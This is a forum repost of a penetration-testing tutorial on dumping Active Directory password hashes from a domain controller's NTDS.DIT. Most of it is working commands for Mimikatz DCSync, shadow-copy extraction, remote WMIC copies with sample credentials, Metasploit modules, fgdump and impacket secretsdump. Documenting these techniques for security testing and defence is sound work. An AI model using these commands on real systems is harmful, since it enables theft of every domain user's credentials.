Dumping Domain Password Hashes

  1. 2 months ago
    Edited 2 months ago by dbj

    It is very common during penetration tests where domain administrator access has been achieved to extract the password hashes of all the domain users for offline cracking and analysis. These hashes are stored in a database file in the domain controller (NTDS.DIT) with some additional information like group memberships and users.

    The NTDS.DIT file is constantly in use by the operating system and therefore cannot be copied directly to another location for extraction of information. This file can be found in the following Windows location:

    C:\Windows\NTDS\NTDS.dit

    There are various techniques that can be used to extract this file or the information that is stored inside it however the majority of them are using one of these methods:

    • Domain Controller Replication Services
    • Native Windows Binaries
    • WMI

    Mimikatz

    Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to retrieve the password hashes from the NTDS.DIT file. This technique eliminates the need to authenticate directly with the domain controller as it can be executed from any system that is part of the domain from the context of domain administrator. Therefore it is the standard technique for red teams as it is less noisy.

    lsadump::dcsync /domain:pentestlab.local /all /csv

    mimikatz-dump-domain-hashes-via-dcsync-clear-version.png

    Mimikatz – Dump Domain Hashes via DCSync

    By specifying the domain username with the /user parameter Mimikatz can dump all the account information of this particular user including his password hash.

    lsadump::dcsync /domain:pentestlab.local /user:test

    mimikatz-dump-domain-hashes-via-dcsync-clear-version.png

    Mimikatz – Dump User Hash via DCSync

    Alternatively executing Mimikatz directly in the domain controller password hashes can be dumped via the lsass.exe process.

    privilege::debug
    lsadump::lsa /inject

    mimikatz-dump-domain-hashes-via-lsass.png

    Mimikatz – Dump Domain Hashes via lsass

    The password hashes of the domain users will retrieved.

    mimikatz-dump-domain-hashes-via-lsadump.png

    Mimikatz – Dump domain hashes via lsadump

    Empire

    PowerShell Empire has two modules which can retrieve domain hashes via the DCSync attack. Both modules needs to be executed from the perspective of domain administrator and they are using Microsoft replication services. These modules rely on the Invoke-Mimikatz PowerShell script in order to execute Mimikatz commands related to DCSync. The following module will extract the domain hashes to a format similar to the output of Metasploit hashdump command.

    usemodule credentials/mimikatz/dcsync_hashdump

    empire-dcsync-hashdump-module-clean.png

    Empire – DCSync Hashdump Module

    The DCSync module requires a user to be specified in order to extract all the account information.

    empire-dcsync-module.png

    Empire – DCSync Module

    The following information will obtained:

    empire-dcsync-account-information.png

    Empire – DCSync Account Information

    Nishang

    Nishang is a PowerShell framework which enables red teamers and penetration testers to perform offensive operations against systems. The Copy-VSS script can be used to automatically extract the required files: NTDS.DIT, SAM and SYSTEM. The files will be extracted into the current working directory or into any other folder that will specified.

    Import-Module .\Copy-VSS.ps1
    Copy-VSS
    Copy-VSS -DestinationDir C:\ShadowCopy\

    nishang-extract-ntds-powershell.png

    Nishang – Extract NTDS PowerShell

    Alternatively the script can be executed from an existing Meterpreter session by loading the PowerShell extension.

    load powershell
    powershell_import /root/Copy-VSS.ps1
    powershell_execute Copy-VSS

    nishang-extract-ntds-meterpreter.png

    It is also possible to establish a direct PowerShell session with the command powershell_shell in order to extract the files once the script has been imported to the existing Meterpreter session.

    Copy-VSS
    Copy-VSS -DestinationDir C:\Ninja

    nishang-extract-ntds-meterpreter-powershell.png

    Nishang – Extract NTDS Meterpreter PowerShell

    PowerSploit

    PowerSploit contains a PowerShell script which utilizes the volume shadow copy service to create a new volume that could be used for extraction of files.
    Import-Module .\VolumeShadowCopyTools.ps1 New-VolumeShadowCopy -Volume C:\ Get-VolumeShadowCopy

    powersploit-volumeshadowcopytools.png

    PowerSploit – VolumeShadowCopyTools

    Alternatively it can be executed from an existing Meterpreter session by loading the PowerShell extension.

    powershell_shell
    New-VolumeShadowCopy -Volume C:\
    Get-VOlumeShadowCopy

    powersploit-volume-shadow-copy.png

    PowerSploit – Volume Shadow Copy

    Files can then copied from the new volume to a destination path with the command copy.

    Invoke-DCSync

    The Invoke–DCSync is a PowerShell script that was developed by Nick Landers and leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz to retrieve hashes with the Mimikatz method of DCSync. Executing directly the function will generate the following output:

    Invoke-DCSync

    invoke-dcsync-powershell.png

    Invoke-DCSync – PowerShell

    The results will be formatted into four tables: Domain, User, RID and Hash. However executing the Invoke-DCSync with the parameter -PWDumpFormat will retrieve the hashes in the format: user:id:lm:ntlm:::

    Invoke-DCSync -PWDumpFormat

    invoke-dcsync-powershell-pwdump-format.png

    Invoke-DCSync – PowerShell PWDump Format

    The same output can be achieved by running the script from an existing Meterpreter session.

    invoke-dcsync-metasploit.png

    Invoke-DCSync Metasploit

    With the PWDumpFormat:

    invoke-dcsync-metasploit-pwdump-format.png

    Invoke-DCSync – Metasploit PWDump Format

    ntdsutil

    The ntdsutil is a command line tool that is part of the domain controller ecosystem and its purpose is to enable administrators to access and manage the windows Active Directory database. However it can be abused by penetration testers and red teams to take a snapshot of the existing ntds.dit file which can be copied into a new location for offline analysis and extraction of password hashes.

    ntdsutil
    activate instance ntds
    ifm
    create full C:\ntdsutil
    quit
    quit

    ntdsutil.png

    ntdsutil

    Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in the Active Directory and the SAM and SYSTEM files will be saved into the Registry folder.

    ntdsutil-ntds.png

    ntdsutil – ntds

    DiskShadow

    DiskShadow is a Microsoft signed binary which is used to assist administrators with operations related to the Volume Shadow Copy Service (VSS). Originally bohops wrote about this binary in his blog . This binary has two modes interactive and script and therefore a script file can be used that will contain all the necessary commands to automate the process of NTDS.DIT extraction. The script file can contain the following lines in order to create a new volume shadow copy, mount a new drive, execute the copy command and delete the volume shadow copy.

    set context persistent nowriters
    add volume c: alias someAlias
    create
    expose %someAlias% z:
    exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
    delete shadows volume %someAlias%
    reset

    It should be noted that the DiskShadow binary needs to executed from the C:\Windows\System32 path. If it is called from another path the script will not executed correctly.

    diskshadow.exe /s c:\diskshadow.txt

    diskshadow.png

    DiskShadow

    Running the following command directly from the interpreter will list all the available volume shadow copies of the system.

    diskshadow
    LIST SHADOWS ALL

    diskshadow-retrieve-shadow-copies.png

    diskshadow – Retrieve Shadow Copies

    The SYSTEM registry hive should be copied as well since it contains the key to decrypt the contents of the NTDS file.

    reg.exe save hklm\system c:\exfil\system.bak

    diskshadow-copy-system-from-registry.png

    diskshadow – Copy system from Registry

    WMI

    Sean Metcalf demonstrated in his blog that it is possible to remotely extract the NTDS.DIT and SYSTEM files via WMI. This technique is using the vssadmin binary to create the volume shadow copy.

    wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

    wmi-create-volume-shadow-copy.png

    WMI – Create Volume Shadow Copy

    Then it executes the copy command remotely in order to extract the NTDS.DIT file from the volume shadow copy into another directory on the target system.

    wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"

    wmi-copy-ntds-file.png

    WMI – Copy NTDS File

    The same applies and for the SYSTEM file.

    wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"

    wmi-copy-system-file.png

    WMI – Copy System File

    The extracted files can then transferred from the domain controller into another Windows system for dumping the domain password hashes.

    PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
    PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

    wmi-transfer-files-via-copy.png

    Transfer Files via Copy

    Instead of credentials if a Golden ticket has been generated it can be used for authentication with the domain controller via Kerberos.

    vssadmin

    The volume shadow copy is a Windows command line utility which enables administrators to take backups of computers, volumes and files even if they are in use by the operating system. Volume Shadow Copy is running as a service and requires the filesystem to be formatted as NTFS which all the modern operating systems are by default. From a Windows command prompt executing the following will create a snapshot of the C: drive in order files that are not normally accessible by the user to be copied into another location (local folder, network folder or removable media).

    vssadmin create shadow /for=C:

    vssadmin-create-volume-shadow-copy.png

    vssadmin – Create Volume Shadow Copy

    Since all the files in the C: drive have been copied into another location (HarddiskVolumeShadowCopy1) they are not directly used by the operating system and therefore can be accessed and copied into another location. The command copy and will copy the NTDS.DIT and SYSTEM files to a new created folder on the local drive named ShadowCopy.

    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM 
    C:\ShadowCopy

    copy-files-from-volume-shadow-copy.png

    Copy Files from Volume Shadow Copy

    These files needs to be copied from the domain controller into another host for further processing.

    shadowcopy-files.png

    ShadowCopy – Files

    vssown

    Similar to the vssadmin utility Tim Tomes developed vssown which is a visual basic script that can create and delete volume shadow copies, run arbitrary executables from an unmounted shadow copy and initiate and stop the volume shadow copy service.

    cscript vssown.vbs /start cscript vssown.vbs /create c cscript vssown.vbs /list cscript vssown.vbs /delete

    vssown-volume-shadow-copy.png

    vssown – Volume Shadow Copy

    The required files can be copied with the command copy.

    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\vssown
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SYSTEM C:\vssown
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SAM C:\vssown

    vssown-copy-ntds-system-and-sam-files.png

    vssown – Copy NTDS, SYSTEM and SAM Files

    Metasploit

    Metasploit framework has a module which authenticates directly with the domain controller via the server message block (SMB) service, creates a volume shadow copy of the system drive and download copies of the NTDS.DIT and SYSTEM hive into the Metasploit directories. These files can be used with other tools like impacket that can perform extraction of active directory password hashes.

    auxiliary/admin/smb/psexec_ntdsgrab

    metasploit-ntds-module.png

    Metasploit – NTDS Module

    There is also a post exploitation module which can be linked into an existing Meterpreter session in order to retrieve domain hashes via the ntdsutil method.

    windows/gather/credentials/domain_hashdump

    metasploit-domain-hashdump.png

    Alternatively if there is an existing Meterpreter session to the domain controller the command hashdump can be used. However this method is not considered safe as it might crash the domain controller.

    hashdump

    metasploit-hashdump-on-dc.png

    Metasploit – Hashdump on DC

    fgdump

    The fgdump is an old executable file which can extract LanMan and NTLM password hashes. It can be executed locally or remotely if local administrator credentials have been acquired. During execution fgdump will attempt to disable the antivirus that might run on the system and if it is successful will write all the data in two files. If there is an antivirus or an endpoint solution fgdump should not be used as a method of dumping password hashes to avoid detection since it is being flagged by most antivirus companies including Microsoft’s Windows Defender.

    fgdump.exe

    fgdump-domain-controller.png

    fgdump – Domain Controller

    The password hashes can be retrieved by examining the contents of the .pwdump file.

    type 127.0.0.1.pwdump

    fgdump-pwdump-file.png

    fgdump – pwdump File

    NTDS Extraction

    Impacket is a collection of python scripts that can be used to perform various tasks including extraction of contents of the NTDS file. The impacket-secretsdump module requires the SYSTEM and the NTDS database file.

    impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL

    impacket-extract-ntds-contents.png

    impacket – Extract NTDS Contents

    Furthermore impacket can dump the domain password hashes remotely from the NTDS.DIT file by using the computer account and its hash for authentication.

    impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1

    impacket-extract-ntds-contents-remotely.png

    impacket – Extract NTDS Contents Remotely

    As an alternative solution to impacket, NTDSDumpEx binary can extract the domain password hashes from a Windows host.

    NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

    ntdsdumpex.png

    NTDSDumpEx

    There is also a shell script adXtract that can export the username and password hashes into a format that can be used by common password crackers such as John the Ripper and Hashcat.

    ./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab

    adxtract.png

    adXtract

    The script will write all the information into various files under the project name and when the decryption of the database file NTDS is finished will export the list of users and password hashes into the console. The script will provide extensive information regarding the domain users as it can be demonstrated below.

    adxtract-list-of-users.png

    adXtract – List of Users

    The password hashes will be presented into the following format.

    adxtract-password-hashes.png

  2. https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/?fbclid=IwAR2lqhO-OZc70l88NCh481d9-b9B0CDshARph8nJ2bHNqwkn6r9DF6k1hj8

 

or Sign Up to reply!